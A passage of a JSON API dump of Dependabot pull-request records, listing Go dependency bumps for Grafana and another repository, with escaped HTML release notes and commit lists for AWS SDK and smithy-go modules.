href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/s3/v1.97.1...service/s3/v1.100.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/secretsmanager` from 1.40.1 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/008e12cf64f41c37faeb705f6ce4b77471756f9f\"\u003e\u003ccode\u003e008e12c\u003c/code\u003e\u003c/a\u003e Release 2026-04-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ef109d91f0b772aaebc472633edf13ec0fd907ce\"\u003e\u003ccode\u003eef109d9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6411e6379e509956413b866481ee2362a7cdfc68\"\u003e\u003ccode\u003e6411e63\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e5bf970956db306bf7b5b1bdd8ca71e8cca766b5\"\u003e\u003ccode\u003ee5bf970\u003c/code\u003e\u003c/a\u003e Release 2026-04-24\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdbb88c9400c80ed2487f7b498a54c6206b5c62a\"\u003e\u003ccode\u003ebdbb88c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.40.1...v1.41.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/sts` from 1.41.10 to 1.42.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5aa6e2b081b5d1b038a0cc5d9198c7a37abf6b4c\"\u003e\u003ccode\u003e5aa6e2b\u003c/code\u003e\u003c/a\u003e Release 2023-11-09\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7dbcd52c14c8f992cb2fec090d826ab30881155e\"\u003e\u003ccode\u003e7dbcd52\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9b178445e4365543a410efefd6b0262c2ea3eb84\"\u003e\u003ccode\u003e9b17844\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/efa54869c68f9d770c9b83fda176c452906688ce\"\u003e\u003ccode\u003eefa5486\u003c/code\u003e\u003c/a\u003e Allowlist bucket owner header (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2358\"\u003e#2358\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5118d3bcdd253fbfd02b8e44966ba7a79ecfbf59\"\u003e\u003ccode\u003e5118d3b\u003c/code\u003e\u003c/a\u003e Release 2023-11-08\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f3c195fc3bcd7f20ae84bf0f999dc89e2487eaee\"\u003e\u003ccode\u003ef3c195f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f24b6a0665313f69c97fd3fa62b351358962bda4\"\u003e\u003ccode\u003ef24b6a0\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f5a08768ef820ff5efd62a49ba50c61c9ca5dbcb\"\u003e\u003ccode\u003ef5a0876\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/3674c3886336f797ad40b18bb1db8c35f4c7ed91\"\u003e\u003ccode\u003e3674c38\u003c/code\u003e\u003c/a\u003e Release 2023-11-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b856b28d54158b2e3596afcd799cfbafddd843ca\"\u003e\u003ccode\u003eb856b28\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ecs/v1.41.10...service/s3/v1.42.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.25.0 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.25.0...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/grafana/grafana/pull/124085","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/grafana%2Fgrafana/issues/124085","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/124085/packages"},{"uuid":"4380348588","node_id":"PR_kwDOFyRkIM7YM-Ql","number":10763,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 42 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-04T23:25:42.000Z","updated_at":"2026-05-04T23:37:00.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":42,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.300.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.57.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.4.2+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.18.0","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.1","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.40.0","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.53.1","repository_url":"https://github.com/vmware/govmomi"},{"name":"go.uber.org/zap","old_version":"1.27.1","new_version":"1.28.0","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.2"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.2","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.10","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 25 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.300.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.57.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.4.2+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.18.0` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.1` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.53.1` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.1` | `1.28.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.10` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.17` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.40.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.51.1` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 